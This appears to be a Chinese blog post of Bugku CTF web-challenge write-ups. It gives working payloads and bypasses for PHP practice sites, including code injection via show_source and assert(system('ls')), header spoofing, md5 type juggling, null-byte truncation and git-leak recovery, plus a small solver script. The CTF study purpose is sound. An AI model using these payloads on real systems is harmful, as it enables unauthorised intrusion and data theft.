<!DOCTYPE html>
<html lang="zh-CN">
    <!-- title -->




<!-- keywords -->




<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no" >
    <meta name="author" content="JOe KKK">
    <meta name="renderer" content="webkit">
    <meta name="copyright" content="JOe KKK">
    
    <meta name="keywords" content="hexo,hexo-theme,hexo-blog">
    
    <meta name="description" content="">
    <meta name="description" content="web12 看到在源码中发现了一段注释，转换后是test123,猜测应该是密码。 尝试登陆，管理员用户名应该是 admin发现。ip 被封，抓包该 refer 值吗？尝试一波 区别 referer 和 XFF：_ referer:返回前一页面的地址信息_ XFF:返回最真实的源地址 ip修改 referer 没有作用，选择增加 XFF 登陆成功，返回 flag  web8-文件包含  hello&#x3D;">
<meta property="og:type" content="article">
<meta property="og:title" content="bugku-web题">
<meta property="og:url" content="http://example.com/2021/04/04/bugku/index.html">
<meta property="og:site_name" content="MA4OUT7">
<meta property="og:description" content="web12 看到在源码中发现了一段注释，转换后是test123,猜测应该是密码。 尝试登陆，管理员用户名应该是 admin发现。ip 被封，抓包该 refer 值吗？尝试一波 区别 referer 和 XFF：_ referer:返回前一页面的地址信息_ XFF:返回最真实的源地址 ip修改 referer 没有作用，选择增加 XFF 登陆成功，返回 flag  web8-文件包含  hello&#x3D;">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/2021/04/04/bugku/121.jpg">
<meta property="og:image" content="http://example.com/2021/04/04/bugku/122.jpg">
<meta property="og:image" content="http://example.com/2021/04/04/bugku/123.jpg">
<meta property="og:image" content="http://example.com/2021/04/04/bugku/8.jpg">
<meta property="og:image" content="http://example.com/2021/04/04/bugku/9.jpg">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200819130337279.png#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200819131544322.png#pic_center">
<meta property="og:image" content="http://example.com/2021/04/04/bugku/10.jpg">
<meta property="og:image" content="http://example.com/2021/04/04/bugku/401.jpg">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210309093112107.png">
<meta property="og:image" content="http://example.com/2021/04/04/bugku/402.jpg">
<meta property="og:image" content="http://example.com/2021/04/04/bugku/21.jpg">
<meta property="og:image" content="http://example.com/2021/04/04/bugku/21-1.jpg">
<meta property="og:image" content="http://example.com/2021/04/04/bugku/php-1.jpg">
<meta property="og:image" content="http://example.com/2021/04/04/bugku/php-2.jpg">
<meta property="og:image" content="http://example.com/2021/04/04/bugku/php-3.jpg">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210317105508459.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80OTYzMzMxMA==,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="http://example.com/2021/04/04/bugku/php-4.jpg">
<meta property="og:image" content="http://example.com/2021/04/04/bugku/php-5.jpg">
<meta property="og:image" content="http://example.com/2021/04/04/bugku/dong.jpg">
<meta property="og:image" content="http://example.com/2021/04/04/bugku/24-1.jpg">
<meta property="og:image" content="http://example.com/2021/04/04/bugku/27-1.jpg">
<meta property="og:image" content="http://example.com/2021/04/04/bugku/31.jpg">
<meta property="og:image" content="http://example.com/2021/04/04/bugku/41.jpg">
<meta property="article:published_time" content="2021-04-04T13:06:06.000Z">
<meta property="article:modified_time" content="2021-04-08T13:46:07.239Z">
<meta property="article:author" content="JOe KKK">
<meta property="article:tag" content="bugku">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2021/04/04/bugku/121.jpg">
    <meta http-equiv="Cache-control" content="no-cache">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"/>
    
    <title>bugku-web题 · Ma4out7&#39;s Blog</title>
    <style type="text/css">
    @font-face {
        font-family: 'Oswald-Regular';
        src: url("/font/Oswald-Regular.ttf");
    }

    body {
        margin: 0;
    }

    header,
    footer,
    .back-top,
    .sidebar,
    .container,
    .site-intro-meta,
    .toc-wrapper {
        display: none;
    }

    .site-intro {
        position: relative;
        z-index: 3;
        width: 100%;
        /* height: 50vh; */
        overflow: hidden;
    }

    .site-intro-placeholder {
        position: absolute;
        z-index: -2;
        top: 0;
        left: 0;
        width: calc(100% + 300px);
        height: 100%;
        background: repeating-linear-gradient(-45deg, #444 0, #444 80px, #333 80px, #333 160px);
        background-position: center center;
        transform: translate3d(-226px, 0, 0);
        animation: gradient-move 2.5s ease-out 0s infinite;
    }

    @keyframes gradient-move {
        0% {
            transform: translate3d(-226px, 0, 0);
        }
        100% {
            transform: translate3d(0, 0, 0);
        }
    }

</style>

    <link rel="preload" href= "/css/style.css?v=20180824" as="style" onload="this.onload=null;this.rel='stylesheet'" />
    <link rel="stylesheet" href= "/css/mobile.css?v=20180824" media="(max-width: 980px)">
    
    <link rel="preload" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'" />
    
    <!-- /*! loadCSS. [c]2017 Filament Group, Inc. MIT License */
/* This file is meant as a standalone workflow for
- testing support for link[rel=preload]
- enabling async CSS loading in browsers that do not support rel=preload
- applying rel preload css once loaded, whether supported or not.
*/ -->
<script>
(function( w ){
	"use strict";
	// rel=preload support test
	if( !w.loadCSS ){
		w.loadCSS = function(){};
	}
	// define on the loadCSS obj
	var rp = loadCSS.relpreload = {};
	// rel=preload feature support test
	// runs once and returns a function for compat purposes
	rp.support = (function(){
		var ret;
		try {
			ret = w.document.createElement( "link" ).relList.supports( "preload" );
		} catch (e) {
			ret = false;
		}
		return function(){
			return ret;
		};
	})();

	// if preload isn't supported, get an asynchronous load by using a non-matching media attribute
	// then change that media back to its intended value on load
	rp.bindMediaToggle = function( link ){
		// remember existing media attr for ultimate state, or default to 'all'
		var finalMedia = link.media || "all";

		function enableStylesheet(){
			link.media = finalMedia;
		}

		// bind load handlers to enable media
		if( link.addEventListener ){
			link.addEventListener( "load", enableStylesheet );
		} else if( link.attachEvent ){
			link.attachEvent( "onload", enableStylesheet );
		}

		// Set rel and non-applicable media type to start an async request
		// note: timeout allows this to happen async to let rendering continue in IE
		setTimeout(function(){
			link.rel = "stylesheet";
			link.media = "only x";
		});
		// also enable media after 3 seconds,
		// which will catch very old browsers (android 2.x, old firefox) that don't support onload on link
		setTimeout( enableStylesheet, 3000 );
	};

	// loop through link elements in DOM
	rp.poly = function(){
		// double check this to prevent external calls from running
		if( rp.support() ){
			return;
		}
		var links = w.document.getElementsByTagName( "link" );
		for( var i = 0; i < links.length; i++ ){
			var link = links[ i ];
			// qualify links to those with rel=preload and as=style attrs
			if( link.rel === "preload" && link.getAttribute( "as" ) === "style" && !link.getAttribute( "data-loadcss" ) ){
				// prevent rerunning on link
				link.setAttribute( "data-loadcss", true );
				// bind listeners to toggle media back
				rp.bindMediaToggle( link );
			}
		}
	};

	// if unsupported, run the polyfill
	if( !rp.support() ){
		// run once at least
		rp.poly();

		// rerun poly on an interval until onload
		var run = w.setInterval( rp.poly, 500 );
		if( w.addEventListener ){
			w.addEventListener( "load", function(){
				rp.poly();
				w.clearInterval( run );
			} );
		} else if( w.attachEvent ){
			w.attachEvent( "onload", function(){
				rp.poly();
				w.clearInterval( run );
			} );
		}
	}


	// commonjs
	if( typeof exports !== "undefined" ){
		exports.loadCSS = loadCSS;
	}
	else {
		w.loadCSS = loadCSS;
	}
}( typeof global !== "undefined" ? global : this ) );
</script>

    <link rel="icon" href= "/assets/favicon.ico" />
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js" as="script" />
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js" as="script" />
    <link rel="preload" href="/scripts/main.js" as="script" />
    <link rel="preload" as="font" href="/font/Oswald-Regular.ttf" crossorigin>
    <link rel="preload" as="font" href="https://at.alicdn.com/t/font_327081_1dta1rlogw17zaor.woff" crossorigin>
    
    <!-- fancybox -->
    <script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.js" defer></script>
    <!-- 百度统计  -->
    
    <!-- 谷歌统计  -->
    
<meta name="generator" content="Hexo 5.2.0"></head>

    
        <body class="post-body">
    
    
<header class="header">

    <div class="read-progress"></div>
    <div class="header-sidebar-menu">&#xe775;</div>
    <!-- post页的toggle banner  -->
    
    <div class="banner">
            <div class="blog-title">
                <a href="/" >Ma4out7&#39;s Blog</a>
            </div>
            <div class="post-title">
                <a href="#" class="post-name">bugku-web题</a>
            </div>
    </div>
    
    <a class="home-link" href=/>Ma4out7's Blog</a>
</header>
    <div class="wrapper">
        <div class="site-intro" style="







height:50vh;
">
    
    <!-- 主页  -->
    
    
    <!-- 404页  -->
            
    <div class="site-intro-placeholder"></div>
    <div class="site-intro-img" style="background-image: url(/intro/post-bg.jpg)"></div>
    <div class="site-intro-meta">
        <!-- 标题  -->
        <h1 class="intro-title">
            <!-- 主页  -->
            
            bugku-web题
            <!-- 404 -->
            
        </h1>
        <!-- 副标题 -->
        <p class="intro-subtitle">
            <!-- 主页副标题  -->
            
            
            <!-- 404 -->
            
        </p>
        <!-- 文章页meta -->
        
            <div class="post-intros">
                <!-- 文章页标签  -->
                
                    <div class= post-intro-tags >
    
        <a class="post-tag" href="javascript:void(0);" data-tags = "bugku">bugku</a>
    
</div>
                
                
                    <div class="post-intro-read">
                        <span>字数统计: <span class="post-count word-count">2.8k</span>阅读时长: <span class="post-count reading-time">12 min</span></span>
                    </div>
                
                <div class="post-intro-meta">
                    <span class="post-intro-calander iconfont-archer">&#xe676;</span>
                    <span class="post-intro-time">2021/04/04</span>
                    
                    <span id="busuanzi_container_page_pv" class="busuanzi-pv">
                        <span class="iconfont-archer">&#xe602;</span>
                        <span id="busuanzi_value_page_pv"></span>
                    </span>
                    
                    <span class="shareWrapper">
                        <span class="iconfont-archer shareIcon">&#xe71d;</span>
                        <span class="shareText">Share</span>
                        <ul class="shareList">
                            <li class="iconfont-archer share-qr" data-type="qr">&#xe75b;
                                <div class="share-qrcode"></div>
                            </li>
                            <li class="iconfont-archer" data-type="weibo">&#xe619;</li>
                            <li class="iconfont-archer" data-type="qzone">&#xe62e;</li>
                            <li class="iconfont-archer" data-type="twitter">&#xe634;</li>
                            <li class="iconfont-archer" data-type="facebook">&#xe67a;</li>
                        </ul>
                    </span>
                </div>
            </div>
        
    </div>
</div>
        <script>
 
  // get user agent
  var browser = {
    versions: function () {
      var u = window.navigator.userAgent;
      return {
        userAgent: u,
        trident: u.indexOf('Trident') > -1, //IE内核
        presto: u.indexOf('Presto') > -1, //opera内核
        webKit: u.indexOf('AppleWebKit') > -1, //苹果、谷歌内核
        gecko: u.indexOf('Gecko') > -1 && u.indexOf('KHTML') == -1, //火狐内核
        mobile: !!u.match(/AppleWebKit.*Mobile.*/), //是否为移动终端
        ios: !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/), //ios终端
        android: u.indexOf('Android') > -1 || u.indexOf('Linux') > -1, //android终端或者uc浏览器
        iPhone: u.indexOf('iPhone') > -1 || u.indexOf('Mac') > -1, //是否为iPhone或者安卓QQ浏览器
        iPad: u.indexOf('iPad') > -1, //是否为iPad
        webApp: u.indexOf('Safari') == -1, //是否为web应用程序，没有头部与底部
        weixin: u.indexOf('MicroMessenger') == -1, //是否为微信浏览器
        uc: u.indexOf('UCBrowser') > -1 //是否为android下的UC浏览器
      };
    }()
  }
  console.log("userAgent:" + browser.versions.userAgent);

  // callback
  function fontLoaded() {
    console.log('font loaded');
    if (document.getElementsByClassName('site-intro-meta')) {
      document.getElementsByClassName('intro-title')[0].classList.add('intro-fade-in');
      document.getElementsByClassName('intro-subtitle')[0].classList.add('intro-fade-in');
      var postIntros = document.getElementsByClassName('post-intros')[0]
      if (postIntros) {
        postIntros.classList.add('post-fade-in');
      }
    }
  }

  // UC不支持跨域，所以直接显示
  function asyncCb(){
    if (browser.versions.uc) {
      console.log("UCBrowser");
      fontLoaded();
    } else {
      WebFont.load({
        custom: {
          families: ['Oswald-Regular']
        },
        loading: function () {  //所有字体开始加载
          // console.log('loading');
        },
        active: function () {  //所有字体已渲染
          fontLoaded();
        },
        inactive: function () { //字体预加载失败，无效字体或浏览器不支持加载
          console.log('inactive: timeout');
          fontLoaded();
        },
        timeout: 5000 // Set the timeout to two seconds
      });
    }
  }

  function asyncErr(){
    console.warn('script load from CDN failed, will load local script')
  }

  // load webfont-loader async, and add callback function
  function async(u, cb, err) {
    var d = document, t = 'script',
      o = d.createElement(t),
      s = d.getElementsByTagName(t)[0];
    o.src = u;
    if (cb) { o.addEventListener('load', function (e) { cb(null, e); }, false); }
    if (err) { o.addEventListener('error', function (e) { err(null, e); }, false); }
    s.parentNode.insertBefore(o, s);
  }

  var asyncLoadWithFallBack = function(arr, success, reject) {
      var currReject = function(){
        reject()
        arr.shift()
        if(arr.length)
          async(arr[0], success, currReject)
        }

      async(arr[0], success, currReject)
  }

  asyncLoadWithFallBack([
    "https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js", 
    "https://cdn.bootcss.com/webfont/1.6.28/webfontloader.js",
    "/lib/webfontloader.min.js"
  ], asyncCb, asyncErr)
</script>        
        <img class="loading" src="/assets/loading.svg" style="display: block; margin: 6rem auto 0 auto; width: 6rem; height: 6rem;" />
        <div class="container container-unloaded">
            <main class="main post-page">
    <article class="article-entry">
        <h3 id="web12"><a href="#web12" class="headerlink" title="web12"></a>web12</h3><ul>
<li>看到<br><img src="/2021/04/04/bugku/121.jpg"><br>在源码中发现了一段注释<br><img src="/2021/04/04/bugku/122.jpg">，转换后是<code>test123</code>,猜测应该是密码。</li>
<li>尝试登陆，管理员用户名应该是 admin<br>发现<img src="/2021/04/04/bugku/123.jpg">。ip 被封，抓包该 refer 值吗？尝试一波</li>
<li>区别 referer 和 XFF：<br>_ referer:返回前一页面的地址信息<br>_ XFF:返回最真实的源地址 ip<br>修改 referer 没有作用，选择增加 XFF</li>
<li>登陆成功，返回 flag</li>
</ul>
<h3 id="web8-文件包含"><a href="#web8-文件包含" class="headerlink" title="web8-文件包含"></a>web8-文件包含</h3><ul>
<li><img src="/2021/04/04/bugku/8.jpg"></li>
<li><code>hello=show_source(&#39;flag.php&#39;)</code><br><code>hello=file(&#39;flag.php&#39;)</code><br><code>hello=readfile(&#39;flag.php&#39;)</code><br>即可显示 flag</li>
</ul>
<h3 id="web9-文件包含"><a href="#web9-文件包含" class="headerlink" title="web9-文件包含"></a>web9-文件包含</h3><p><img src="/2021/04/04/bugku/9.jpg"><br>正则绕过，文件包含</p>
<ul>
<li>正则匹配的意思是^为开头，$为结尾位置，\w+表示任意个【A-Za-z1-9_】中的数字或字符或下划线；两个美元符号意思是<a target="_blank" rel="noopener" href="https://blog.csdn.net/a757291228/article/details/57083568">可变变量</a>;<br><img src="https://img-blog.csdnimg.cn/20200819130337279.png#pic_center"><br>GLOBALS(要大写的) 全局变量<img src="https://img-blog.csdnimg.cn/20200819131544322.png#pic_center"><br>所以尝试输入 payload:<code>args=GLOBALS</code>。。得到 flag</li>
<li>注意:有源码的题目，要仔细阅读源码，特别关注用户输入部分，敏感词。</li>
</ul>
<h3 id="10-头等舱"><a href="#10-头等舱" class="headerlink" title="10-头等舱"></a>10-头等舱</h3><ul>
<li>源码中没有信息，请求报文里面也没有任何信息，最后发现，居然在 response 报文里面</li>
<li><img src="/2021/04/04/bugku/10.jpg"></li>
</ul>
<h3 id="web40-git-泄露"><a href="#web40-git-泄露" class="headerlink" title="web40-git 泄露"></a>web40-git 泄露</h3><ul>
<li>源码没东西，抓包 response 中也没有东西，后台目录爆破走一波，发现了存在 git 泄露</li>
<li>使用 Gighacker 下载来的文件，怎么办呢？这里原来还可以使用<code>wget -r</code>命令<br>这里涉及到 git 命令操作<code>git reflog</code>获取执行命令日志，如下<br><img src="/2021/04/04/bugku/401.jpg"><br><code>git reset 13ce8d0 //回退到该版本的版本库 多试几个commit id</code><br>返回如下<br><img src="https://img-blog.csdnimg.cn/20210309093112107.png"></li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">git status</span><br><span class="line">git checkout -- flag.txt</span><br><span class="line">&#x2F;&#x2F;将暂存区的 flag.txt 还原到工作区,即flag.txt在本地产生</span><br></pre></td></tr></table></figure>

<p>这里有很多个 commit id，需要多尝试几个，存在多个 flag.txt。<br><img src="/2021/04/04/bugku/402.jpg">有点搞我心态<br>终于找到 flag</p>
<h3 id="web13"><a href="#web13" class="headerlink" title="web13"></a>web13</h3><ul>
<li>F12js 源码审计即可。。。</li>
</ul>
<h3 id="web14-文件包含"><a href="#web14-文件包含" class="headerlink" title="web14-文件包含"></a>web14-文件包含</h3><ul>
<li>题目环境可能有问题，文件包含 payload 之后没有反应。无法读取文件</li>
</ul>
<h3 id="web15-密码爆破"><a href="#web15-密码爆破" class="headerlink" title="web15-密码爆破"></a>web15-密码爆破</h3><ul>
<li>直接 burp 爆破</li>
</ul>
<h3 id="web16-备份文件，php-特性"><a href="#web16-备份文件，php-特性" class="headerlink" title="web16-备份文件，php 特性"></a>web16-备份文件，php 特性</h3><ul>
<li>扫后台，得到备份文件，打开后是代码审计绕过</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">include_once</span> <span class="string">&quot;flag.php&quot;</span>;</span><br><span class="line">ini_set(<span class="string">&quot;display_errors&quot;</span>, <span class="number">0</span>);</span><br><span class="line">$str = strstr($_SERVER[<span class="string">&#x27;REQUEST_URI&#x27;</span>], <span class="string">&#x27;?&#x27;</span>);</span><br><span class="line">$str = substr($str,<span class="number">1</span>);</span><br><span class="line">$str = str_replace(<span class="string">&#x27;key&#x27;</span>,<span class="string">&#x27;&#x27;</span>,$str);</span><br><span class="line">parse_str($str);</span><br><span class="line"><span class="keyword">echo</span> md5($key1);</span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> md5($key2);</span><br><span class="line"><span class="keyword">if</span>(md5($key1) == md5($key2) &amp;&amp; $key1 !== $key2)&#123;</span><br><span class="line">    <span class="keyword">echo</span> $flag.<span class="string">&quot;取得flag&quot;</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<ul>
<li>parse_str()函数把查询字符串解析到变量中。</li>
<li>注意这里<code>if(md5($key1) == md5($key2) &amp;&amp; $key1 !== $key2)</code>语句的绕过<ul>
<li>方法一：md5 冲撞，这里 md5 函数会返回 32 位的字符串，PHP 特性：如果字符串开头<code>0e</code>开头，类型转换会识别为一个科学计数法表示的<code>0</code>,即可绕过</li>
<li>方法二：如果把<code>==</code>换成<code>===</code>,则法一不成立，需要用<code>key1[]=1&amp;key2[]=2</code>,即可绕过。。</li>
</ul>
</li>
</ul>
<h3 id="No-one-knows-regex-better-than-me"><a href="#No-one-knows-regex-better-than-me" class="headerlink" title="No one knows regex better than me"></a>No one knows regex better than me</h3><ul>
<li>代码审计</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line">$zero=$_REQUEST[<span class="string">&#x27;zero&#x27;</span>];</span><br><span class="line">$first=$_REQUEST[<span class="string">&#x27;first&#x27;</span>];</span><br><span class="line">$second=$zero.$first;</span><br><span class="line"><span class="keyword">if</span>(preg_match_all(<span class="string">&quot;/Yeedo|wants|a|girl|friend|or|a|flag/i&quot;</span>,$second))&#123;</span><br><span class="line">    $key=$second;</span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">&quot;/\.\.|flag/&quot;</span>,$key))&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;Noooood hacker!&quot;</span>);</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        $third=$first;</span><br><span class="line">        <span class="keyword">if</span>(preg_match(<span class="string">&quot;/\\|\056\160\150\x70/i&quot;</span>,$third))&#123;</span><br><span class="line">            $end=substr($third,<span class="number">5</span>);</span><br><span class="line">            highlight_file(base64_decode($zero).$end);<span class="comment">//maybe flag in flag.php</span></span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>很明显，这里要构造<code>flag.php</code>,并且绕过正则，又<code>base64_decode($zero)</code>可以知道，<code>flag</code>要进行 base64 转换，那么 first 变量要满足第一个正则，且不能满足第二个正则，满足第三个正则即可。。</p>
<ul>
<li>这里注意第三正则<code>if(preg_match(&quot;/\\|\056\160\150\x70/i&quot;,$third))</code>,php 会自动转换十六进制和八进制，即<code>|.php</code>，还有字符串优先级比’|’高，’&#39;转义符同理</li>
</ul>
<ul>
<li>最终 payload<code>zero=ZmxhZy4=&amp;first=oro|.php</code></li>
</ul>
<h3 id="web20–cookie-欺骗"><a href="#web20–cookie-欺骗" class="headerlink" title="web20–cookie 欺骗"></a>web20–cookie 欺骗</h3><ul>
<li>url 中发现有一段 base64 编码的字符，解码后得到 keys.txt 访问 keys.txt 跟初始访问的内容一样。 没有其他突破点，这个时候利用 filename 尝试查看 php 源码，line 猜测可能是行数，操作发现果然，写脚本拿 index.php 源码 随后构造 filename 为 keys.php cookie 为 margin=margin 即可得到 flag</li>
</ul>
<h3 id="web21"><a href="#web21" class="headerlink" title="web21"></a>web21</h3><ul>
<li>F12 源码出看到<code>1p.html</code>,访问后，在 bp 抓包的到 response 内容<br><img src="/2021/04/04/bugku/21.jpg"></li>
<li>经过解码后,得到源码</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&quot;if(!<span class="subst">$_GET</span>[&#x27;id&#x27;])</span></span><br><span class="line"><span class="string">&#123;</span></span><br><span class="line"><span class="string">	header(&#x27;Location: hello.php?id=1&#x27;);</span></span><br><span class="line"><span class="string">	exit();</span></span><br><span class="line"><span class="string">&#125;</span></span><br><span class="line"><span class="string"><span class="subst">$id</span>=<span class="subst">$_GET</span>[&#x27;id&#x27;];</span></span><br><span class="line"><span class="string"><span class="subst">$a</span>=<span class="subst">$_GET</span>[&#x27;a&#x27;];</span></span><br><span class="line"><span class="string"><span class="subst">$b</span>=<span class="subst">$_GET</span>[&#x27;b&#x27;];</span></span><br><span class="line"><span class="string">if(stripos(<span class="subst">$a</span>,&#x27;.&#x27;))</span></span><br><span class="line"><span class="string">&#123;</span></span><br><span class="line"><span class="string">	echo &#x27;no no no no no no no&#x27;;</span></span><br><span class="line"><span class="string">	return ;</span></span><br><span class="line"><span class="string">&#125;</span></span><br><span class="line"><span class="string"><span class="subst">$data</span> = @file_get_contents(<span class="subst">$a</span>,&#x27;r&#x27;);</span></span><br><span class="line"><span class="string">if(<span class="subst">$data</span>==&quot;</span>bugku is a nice plateform!<span class="string">&quot; and <span class="subst">$id</span>==0 and strlen(<span class="subst">$b</span>)&gt;5 and eregi(&quot;</span><span class="number">111</span><span class="string">&quot;.substr(<span class="subst">$b</span>,0,1),&quot;</span><span class="number">1114</span><span class="string">&quot;) and substr(<span class="subst">$b</span>,0,1)!=4)</span></span><br><span class="line"><span class="string">&#123;</span></span><br><span class="line"><span class="string">	<span class="subst">$flag</span> = &quot;</span>flag&#123;***********&#125;<span class="string">&quot;</span></span><br><span class="line"><span class="string">&#125;</span></span><br><span class="line"><span class="string">else</span></span><br><span class="line"><span class="string">&#123;</span></span><br><span class="line"><span class="string">	print &quot;</span>never never never give up !!!<span class="string">&quot;;</span></span><br><span class="line"><span class="string">&#125;</span></span><br><span class="line"><span class="string">?&gt;</span></span><br></pre></td></tr></table></figure>

<ul>
<li>三处绕过<ul>
<li><code>$data = @file_get_contents($a,&#39;r&#39;)</code>要等于”bugku is a nice plateform!”</li>
<li>==弱类型比较</li>
<li>eregi 函数的绕过:截断漏洞</li>
</ul>
</li>
<li>1.伪协议<br>writeup 的思路是利用伪协议 php://input<br>该伪协议可以访问请求的原始数据的只读流，通俗点说就是可以获取 post 报文的实体体(body)的内容<br>file_get_contents()是用来将文件的内容读入到一个字符串中的首选方法</li>
<li>2.弱命令比较<br><code>0e123456</code>以 0e 开头字符串，php 会解析成科学计数法表示的 0，或者直接让 id=adc，比较时<code>abc==0</code>,即为<code>false==0</code> 成立</li>
<li>3.eregi 函数的绕过:截断漏洞<br><code>eregi(&quot;111&quot;.substr($b,0,1),&quot;1114&quot;) and substr($b,0,1)!=4)</code><br>NULL 字符截断是最有名的截断漏洞之一。<br>PHP 内核是 C 语言，用了 C 的一些字符串处理函数，因而遇到 NULL(\x00)字符的时候，处理函数就会把它当作结束标记。<br>在 eregi 函数看来 $b 其实为空字符串‘’，因为把%00(\x00)当作结束符了<br>所以字符匹配模式为‘111’ ,’1114’与之匹配 而首字符为%而不是 4<br>利用 null 截断漏洞成功绕过 eregi()函数</li>
</ul>
<ul>
<li>最终 payload<br><img src="/2021/04/04/bugku/21-1.jpg"></li>
</ul>
<h3 id="web22-assert"><a href="#web22-assert" class="headerlink" title="web22-assert()"></a>web22-assert()</h3><ul>
<li>assert()函数，会把参数当做 PHP 代码执行</li>
<li>payload<code>s=system(&#39;ls&#39;)</code>得到 flag 文件，然后在 URL 中直接访问，得到 flag</li>
</ul>
<h3 id="web17-sql"><a href="#web17-sql" class="headerlink" title="web17-sql"></a>web17-sql</h3><ul>
<li>sql 注入基本步骤</li>
</ul>
<h3 id="web18-Python-脚本"><a href="#web18-Python-脚本" class="headerlink" title="web18-Python 脚本"></a>web18-Python 脚本</h3><ul>
<li>真是秋名山车神，车速好快呀，没想到，真让我算出结果来，但是要在 2 秒内，还是选择 Python 脚本</li>
<li>脚本</li>
</ul>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/local/bin/python3</span></span><br><span class="line"><span class="comment"># coding=utf-8</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">from</span> lxml <span class="keyword">import</span> etree</span><br><span class="line">url = <span class="string">&#x27;http://114.67.246.176:16332/&#x27;</span></span><br><span class="line">sess = requests.session()</span><br><span class="line">page_text = sess.get(url).text</span><br><span class="line">tree = etree.HTML(page_text)</span><br><span class="line">express = tree.xpath(<span class="string">&#x27;//div/text()&#x27;</span>)[<span class="number">0</span>]  <span class="comment"># 注意，返回的是数组</span></span><br><span class="line">express = <span class="string">&quot;&quot;</span>.join(express)[:<span class="number">-3</span>]<span class="comment"># 去掉字符串后面的&#x27;=?;&#x27;,很细节</span></span><br><span class="line">b = eval(express)</span><br><span class="line">data = &#123;</span><br><span class="line">    <span class="string">&#x27;value&#x27;</span>: b</span><br><span class="line">&#125;</span><br><span class="line">print(data)</span><br><span class="line">re_page2_text = sess.post(url=url, data=data).text</span><br><span class="line">print(re_page2_text)</span><br></pre></td></tr></table></figure>

<p>运行脚本是，可能一次不出现 flag，多运行几次就可以了。。。</p>
<h3 id="web19-Python"><a href="#web19-Python" class="headerlink" title="web19-Python"></a>web19-Python</h3><ul>
<li>这道题每次访问都会在 http 返回头文件里面返回不同 base64 加密过的 flag</li>
<li>脚本也得又一波</li>
</ul>
